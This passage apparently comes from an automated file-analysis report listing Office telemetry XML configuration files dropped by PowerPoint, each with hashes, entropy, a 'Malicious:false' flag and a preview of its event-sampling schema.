                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1363
                                                                                                                              Entropy (8bit):4.865619885875738
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d93PDpuMt1k3BNjXMi+EsdnKE+2h6wl/FfcnHAvy:cJLpuMteNjXMzbdKshBdEgvy
                                                                                                                              MD5:A04879626207C9664CF99D44C890DFCC
                                                                                                                              SHA1:85C458FB0A8AA7B7C05F96C45112CA2354688574
                                                                                                                              SHA-256:6FAD9AE9899A02696BBCB19F1DBB10F473C648E0388E66F3BF418CD39A0167B8
                                                                                                                              SHA-512:85E5F73D40343F60CA76CA6A2F3CD8D6425FB86282DD3675A6345744F02C5F227913976237A494044F5966A04AD79FD354CCCD129B068A3CD20C17C986C96C56
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700600" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Graphics" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenGraphics" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Event
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1400
                                                                                                                              Entropy (8bit):4.897158029594799
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9sdDpuct1k3BNjXMi+EsdnKE+2h6wl/FfcnHAvy:cO9pucteNjXMzbdKshBdEgvy
                                                                                                                              MD5:6376C08AA7CA7835598767775E7ECB1D
                                                                                                                              SHA1:0BC011AC0EDF7CF4FC084C0945DAD098FB4B1F23
                                                                                                                              SHA-256:B61F21751A1BEB45D611D9690D89DB70220734D1346DF46BAC3D6A0646B515E7
                                                                                                                              SHA-512:25BB527240B62BC37FB34B26CDA08739955FEA4E4A1EA4147EDE3C4041FDDE842BB20ED125C3E752905255E73C79522D04E6440346263A9A6DF98F043F8C3762
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700601" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Graphics.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenGraphics" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1361
                                                                                                                              Entropy (8bit):4.852747306474377
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9ihDvuMt1k3BNjXMi+EsdnKE+2h6wl/FfI9:c0RvuMteNjXMzbdKshBdS
                                                                                                                              MD5:A0808D03D0581F7CA12467B2BA34915D
                                                                                                                              SHA1:EE5EDC643D79B8F6808CDD1D62E2F13807BFCCBE
                                                                                                                              SHA-256:C29950B7D4C38C43A7C643C4AB5A29B1F982AB7D4F330A8A24E5643B02779256
                                                                                                                              SHA-512:2FF962EE43C147809FB7D62143D4C1AD8C9420CB02F923ED92FA27AB092F7950DD283C9247CF70E6CB0CB56B9F937B2A46320135D7B3A96B6DC07F2E4EB57725
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Android" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAndroid" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTy
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):4.887736207218883
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9trDvuct1k3BNjXMi+EsdnKE+2h6wl/FfI9:c/XvucteNjXMzbdKshBdS
                                                                                                                              MD5:70E890093C1C2F56A0B99A8079F23C27
                                                                                                                              SHA1:67467F99EBC4C93C5986B947A851140A09067DDA
                                                                                                                              SHA-256:0CC85E26784EFEE686CEA301F97BE97B558C882AA1A036FB21E140268AE24E69
                                                                                                                              SHA-512:8A2806788375931624E8B84EACEDBA6B60BA6E031EBFBE7EF5B6CB32090E48F59EAD43B24D6AED808B0AE509BAD7FA4D684CE9E692F56ACEEDB0A7DAF4BD7DD3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Android.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAndroid" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1363
                                                                                                                              Entropy (8bit):4.8587705708675815
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9KRADB2uMt1k3BNjXMi+EsdnKE+2h6wl/FfmCUenT:c2EkuMteNjXMzbdKshBd+CUenT
                                                                                                                              MD5:0A3DE9C03042FD053E30CFCFFC52C3D0
                                                                                                                              SHA1:63D352DC9FC6975845979541972D0186ED94B87D
                                                                                                                              SHA-256:85893B03CCB232F89DE1ED5C61B599FF4103D23421A42C92839596A2EED7C05D
                                                                                                                              SHA-512:6BB9D0DBF3B2241258208FEC3D94BD4753DAE9313207823E3B6EC8FF75CB05F27B96A845F777A72B5B51971187C7390FCD51AF4697183F76B6D2A79E3407F8DC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700700" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Identity" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenIdentity" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Event
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1400
                                                                                                                              Entropy (8bit):4.894341017418388
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9/0DB2uct1k3BNjXMi+EsdnKE+2h6wl/FfmCUenT:cxokucteNjXMzbdKshBd+CUenT
                                                                                                                              MD5:B0B6A86EFA324A88FE0647DC1DEC0E1C
                                                                                                                              SHA1:7E545AC9CA04B042563FA436FA7DD04DE05FB070
                                                                                                                              SHA-256:2A9BA858E7EA370EB57DEC5782EFBA0583D1487F20BE06832ADD929FC235DF00
                                                                                                                              SHA-512:5F78935320BBD751088866648D112C05AC005E0770C38F41AEAD08074FCCD27BF93C914C14D94E7721651FC61F23874ED251C8B7F55B5F6AFC4900769EFB6C8C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700701" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Identity.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenIdentity" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1376
                                                                                                                              Entropy (8bit):4.889868179029986
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9JzVKUDXRTuMt1k3BNjXMi+EsdnKE+2h6wl/FfMgeD:cDzVRXRTuMteNjXMzbdKshBdEgeD
                                                                                                                              MD5:8ABC6C80D70828CCBF931DB53570E78D
                                                                                                                              SHA1:FA96C9E807432380136CE25CA6338171CB24C00C
                                                                                                                              SHA-256:5E8E41B8D6FD85B994F08F6AFC1E0588374374826FF6532C87412BFBF976FBE5
                                                                                                                              SHA-512:C5F06C663D96C0811B551259BD2A598E9B6228323D1010779000EC8C8814A89A647F886F08155D7724A139039F38D533437244AA61B87EA6E1D889FF05CC4BD8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="fa
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1413
                                                                                                                              Entropy (8bit):4.924333853581855
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9OzJDXRTuct1k3BNjXMi+EsdnKE+2h6wl/FfMgeD:cYzZXRTucteNjXMzbdKshBdEgeD
                                                                                                                              MD5:E2D5CDDC1703A2DA665902D2AC12EF81
                                                                                                                              SHA1:1D427C4F3C1AA10B10F5528D3A350C6CC74D4AD2
                                                                                                                              SHA-256:41BFFC0E05E5AB2EB630330E8AB0121FD69BEB95C08678EE0ABDF418B0916C28
                                                                                                                              SHA-512:A7AA9D7EC80305900151A1935F7C6057B4D47E9D434127D28769A6AEB7142E9CF457534D7C82EF5F8DFFA012AFDC32B9E1805AE75C8AD9EB8DB2A070A6F4CE79
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInf
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1377
                                                                                                                              Entropy (8bit):4.871091054185326
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9I1wjDcpuMt1k3BNjXMi+EsdnKE+2h6wl/FfrfXU:c+wPcpuMteNjXMzbdKshBdjfE
                                                                                                                              MD5:B46B165F9E745F4F5B503276342D3296
                                                                                                                              SHA1:A737470E29E337549DFBFC10C7A17FE25A42AB7E
                                                                                                                              SHA-256:F0180146BF0C66C553B4A1D74187ACFD43A2362A5609211C1CA68499FD17E9D4
                                                                                                                              SHA-512:9CD5B98D519507FAC488F79E60E645EC2AF60CF2470391B2AD7031795691F26DF29B5B86D598B3374135E6E3190409E7810D33B145B19550B534E63B52F93D56
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700850" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Experimentation" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExperimentation" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="f
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1414
                                                                                                                              Entropy (8bit):4.904142181625683
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9reDcpuct1k3BNjXMi+EsdnKE+2h6wl/FfrfXU:c5ucpucteNjXMzbdKshBdjfE
                                                                                                                              MD5:9E87387E0AC4BD3036DF06828ED7CF1F
                                                                                                                              SHA1:A171101AC5BD83395C2376388F1823CE45ACA595
                                                                                                                              SHA-256:6F0E926E57A575E4DE7C5CB8D77ABA73C0B783D418FB70608A1F2EA727B8560F
                                                                                                                              SHA-512:E6C0933D3EDBE13005737F3BCB9687345336F728318F9B26771FCA14281C1FA880E47D0D5866E005B7FEB2A764DDC827B7032EABB0C68BC45C0F7756C4DAFB14
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700851" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Experimentation.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExperimentation" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1370
                                                                                                                              Entropy (8bit):4.864243128033522
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d96hD4uMt1k3BNjXMi+EsdnKE+2h6wl/FfBMYw9:cIR4uMteNjXMzbdKshBdZFS
                                                                                                                              MD5:93F3BA34414AC3EDE75938D7BBD99E1B
                                                                                                                              SHA1:C47EEA0BF9F154685AF5675825E824899A55B2CD
                                                                                                                              SHA-256:BA3DACE531F26E80D49925FF7301134F3CB5121F7FBC91258A3CA6309D040EA4
                                                                                                                              SHA-512:828C0D0C06B5E8513EBAB206A098FD9B26630F110525EEC039A5BEC04276589868838550662B3A11F534A1258C884D8A2141E4EE891AF47F9010C5F9EBEE9A19
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1407
                                                                                                                              Entropy (8bit):4.898680122194441
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9EQrD4uct1k3BNjXMi+EsdnKE+2h6wl/FfBMYw9:cmQX4ucteNjXMzbdKshBdZFS
                                                                                                                              MD5:AB22551D18F3734C6F3DE50B4DA0E627
                                                                                                                              SHA1:AEC5ED838516B17C17CD5A483BFC7009C0C4403C
                                                                                                                              SHA-256:E0CF8E6EF4246809D92BB6A141BEDD458089D7D01A1E49F6DD33FE9E85D0FB69
                                                                                                                              SHA-512:7AFBD54B964483422BD38E83589A2918BB44ACDEC2885414872661D7C3DD1531857027C7C126F014A1A782BF1839334C0072FDED87C7A288D466D5170A84999A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1368
                                                                                                                              Entropy (8bit):4.870003164588434
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9PQUD2uMt1k3BNjXMi+EsdnKE+2h6wl/FfpNZ17B:clv2uMteNjXMzbdKshBdRNZ1l
                                                                                                                              MD5:A6C7DB427C635E44EFF78659CBA27BE2
                                                                                                                              SHA1:E0E84CFCB9F45C03117B5993F3A2A25E5428E49A
                                                                                                                              SHA-256:115428712E29C5E4A842323CBDB457DBC4A5DA2883A2E2DAF25F3B8386F5FC93
                                                                                                                              SHA-512:F1411CDB492EE6CA1C0297D57E809D9173506B4277857A5BAB054ECDC060C5BBBC7C0577D3EF18C428AFEDBAEF1656F7F9260B8BB062960D9DC1D3A68A23A218
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.DynamicCanvas" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenWildfire" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1405
                                                                                                                              Entropy (8bit):4.903878162573853
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9EQYD2uct1k3BNjXMi+EsdnKE+2h6wl/FfpNZ17B:cah2ucteNjXMzbdKshBdRNZ1l
                                                                                                                              MD5:9281BF3FDC7334D3DD411E21DB8011C2
                                                                                                                              SHA1:0FF9A83687767BE068559F78D1BBC986C25EC616
                                                                                                                              SHA-256:D99F85AAD2310137D583B055C0DA9A03F6EB1281D97F0BA151C891E4F67D3DD1
                                                                                                                              SHA-512:3505E4C2FE8BDD0147BDA976EC0C01E7F9A0622C8EABFEE7EC1780C36A155A1CF6E21E965A91DE7D045DDFCC03F5549E654F82FFB82DB288D685538B2FF039F7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.DynamicCanvas.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenWildfire" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1361
                                                                                                                              Entropy (8bit):4.848504126163618
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9rFTDluMt1k3BNjXMi+EsdnKE+2h6wl/FfcFE0Q8:chFfluMteNjXMzbdKshBdEw8
                                                                                                                              MD5:491056D095AAD4F225D85F36E656B9B2
                                                                                                                              SHA1:CCD2133FB244AB86B9F3B7115603351804F915B3
                                                                                                                              SHA-256:EE67AF8222350B8CB0D237E56FF2F77CFBBCC269D237033F3594010DFF4FE558
                                                                                                                              SHA-512:7BFC1FF6E7BA46ABAEE2C91DCC2E89893CA5CE6E3270737009D86DBB581066E598231AAC472ABE0EAA6BBA5F8ED916563266EC9DC7A5D015B96AFD255900702F
                                                                                                                              Malicious:false
